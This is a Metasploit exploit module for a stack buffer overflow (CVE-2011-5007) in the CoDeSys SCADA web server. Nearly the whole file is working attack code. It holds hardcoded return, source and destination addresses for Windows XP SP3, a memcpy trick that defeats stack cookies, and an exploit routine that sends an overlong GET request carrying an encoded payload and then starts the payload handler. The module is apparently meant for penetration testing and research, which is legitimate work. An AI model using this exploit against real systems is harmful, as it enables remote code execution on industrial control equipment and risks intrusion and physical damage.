Path: blob/master/modules/exploits/windows/scada/codesys_web_server.rb
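##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::Tcp

  # Module metadata. Two targets are offered: the v2.3 entry is a plain
  # return-address overwrite, the v3.4 entry additionally carries the
  # Src/Dest addresses consumed by a memcpy() call (see the per-target
  # comments below). The addresses were verified only on the Windows XP SP3
  # builds listed in the =begin block at the end of the file.
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SCADA 3S CoDeSys CmpWebServer Stack Buffer Overflow',
      'Description'    => %q{
          This module exploits a remote stack buffer overflow vulnerability in
        3S-Smart Software Solutions product CoDeSys Scada Web Server Version
        1.1.9.9. This vulnerability affects versions 3.4 SP4 Patch 2 and
        earlier.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Luigi Auriemma', # Original discovery and poc
          'Celil UNUVER',
          'TecR0c <roccogiovannicalvi[at]gmail.com>', # Module Metasploit
          'sinn3r',
          'Michael Coppola'
        ],
      'References'     =>
        [
          [ 'CVE', '2011-5007'],
          [ 'OSVDB', '77387'],
          [ 'URL', 'http://aluigi.altervista.org/adv/codesys_1-adv.txt' ],
          [ 'EDB', '18187' ],
          [ 'URL', 'https://www.cisa.gov/uscert/ics/alerts/ICS-ALERT-11-336-01A' ],
          # The following clarifies why two people are credited for the discovery
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-12-006-01']
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
          'DisablePayloadHandler' => false
        },
      'Platform'       => 'win',
      # BadChars are the bytes the encoder must keep out of the payload. The
      # buffer is sent as the URL path of a GET (see #exploit), so NUL,
      # whitespace and URL-significant characters ('?', '#', '%', ':', '\')
      # are excluded -- presumably because they would end or alter the
      # request line.
      'Payload'        =>
        {
          'size' => 650,
          'BadChars' => "\x00\x09\x0a\x3f\x20\x23\x5e\x25\x3a\x5c",
        },

      'Targets'        =>
        [
          [
            'CoDeSys v2.3 on Windows XP SP3',
            {
              'Ret' => 0x7E4456F7, # jmp esp user32
              'Offset' => 775      # filler bytes written before 'Ret' (see #exploit)
            }
          ],
          [
            'CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3',
            {
              # Abuse a memcpy() call to circumvent stack cookies
              'Offset' => 525,
              'Ret' => 0x02CDFD68,
              'Src' => 0x02CDFD58,
              'Dest' => 0x02CDFA14
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2011-12-02'
    ))

    register_options([Opt::RPORT(8080)])
  end

  # Banner check only: send a minimal GET and look for the "3S_WebServer"
  # marker in whatever the service returns. Because the server exposes no
  # version string, a match yields Detected (not Vulnerable); patched and
  # unpatched installs look the same to this check. A target that sends no
  # data at all (timeout, closed connection) is reported as Unknown rather
  # than Safe, since nothing about the product was learned.
  #
  # @return [Msf::Exploit::CheckCode] Detected, Safe or Unknown
  def check
    connect
    sock.put("GET / HTTP/1.1\r\nHost: #{rhost}\r\n\r\n")
    res = sock.get_once
    disconnect

    vprint_line(res.to_s)

    # No response is not evidence of a safe host; get_once returned nil.
    return Exploit::CheckCode::Unknown if res.nil?

    # Can't flag the web server as vulnerable, because it doesn't
    # give us a version
    if res.to_s =~ /3S_WebServer/
      return Exploit::CheckCode::Detected
    else
      return Exploit::CheckCode::Safe
    end
  end

  # Build the overflowing request path for the selected target and send it.
  # Both branches write target['Offset'] filler bytes, then the control-flow
  # data and the encoded payload; the whole buffer travels in the request
  # line of a single HTTP/1.0 GET. From a monitoring standpoint the
  # observable artefact is therefore one GET whose path is several hundred
  # bytes long (Offset plus payload) on the CoDeSys web server port
  # (RPORT, 8080 by default).
  def exploit
    connect

    if target.name =~ /v2\.3/
      # Classic layout: random filler up to 'Offset', then 'Ret' packed as a
      # 32-bit little-endian value, an 8-byte NOP sled and the payload.
      buffer = rand_text(target['Offset'])
      buffer << [target.ret].pack('V')
      buffer << make_nops(8)
      buffer << payload.encoded

    else
      # CoDeSys v3.4 SP4 Patch 2 on Windows XP SP3
      # Alphanumeric filler here, followed by the three addresses the memcpy()
      # path consumes (Ret, Src, Dest) and a 0x7FFFFFFF word that, per the
      # original author's note, passes a signed comparison.
      buffer = rand_text_alphanumeric(target['Offset'])
      buffer << [target.ret].pack('V')
      buffer << [target['Src']].pack('V')
      buffer << [target['Dest']].pack('V')
      buffer << [0x7FFFFFFF].pack('V') # Satisfy signed comparison
      buffer << make_nops(8)
      buffer << payload.encoded
      buffer << "\\a" # literal backslash followed by 'a' (two bytes), not a bell
    end

    sploit = "GET /#{buffer} HTTP/1.0\r\n\r\n\r\n"

    print_status("Trying target #{target.name}...")
    sock.put(sploit)
    # Echo whatever the server answers within 5 seconds; nil (no reply) is
    # expected once the process has been hijacked.
    res = sock.get_once(-1, 5)
    print_line(res) unless res.nil?

    # Hand over to the payload handler before tearing the socket down.
    handler
    disconnect
  end
end

=begin
target.ret verified on:
- Win XP SP3 unpatched
- Win XP SP3 fully-patched
- Win XP SP3 fully-patched with Office 2007 Ultimate SP2 installed
=end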